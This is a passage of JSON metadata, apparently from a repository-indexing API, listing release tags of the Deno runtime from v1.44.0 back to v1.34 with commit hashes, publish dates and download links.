ts"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1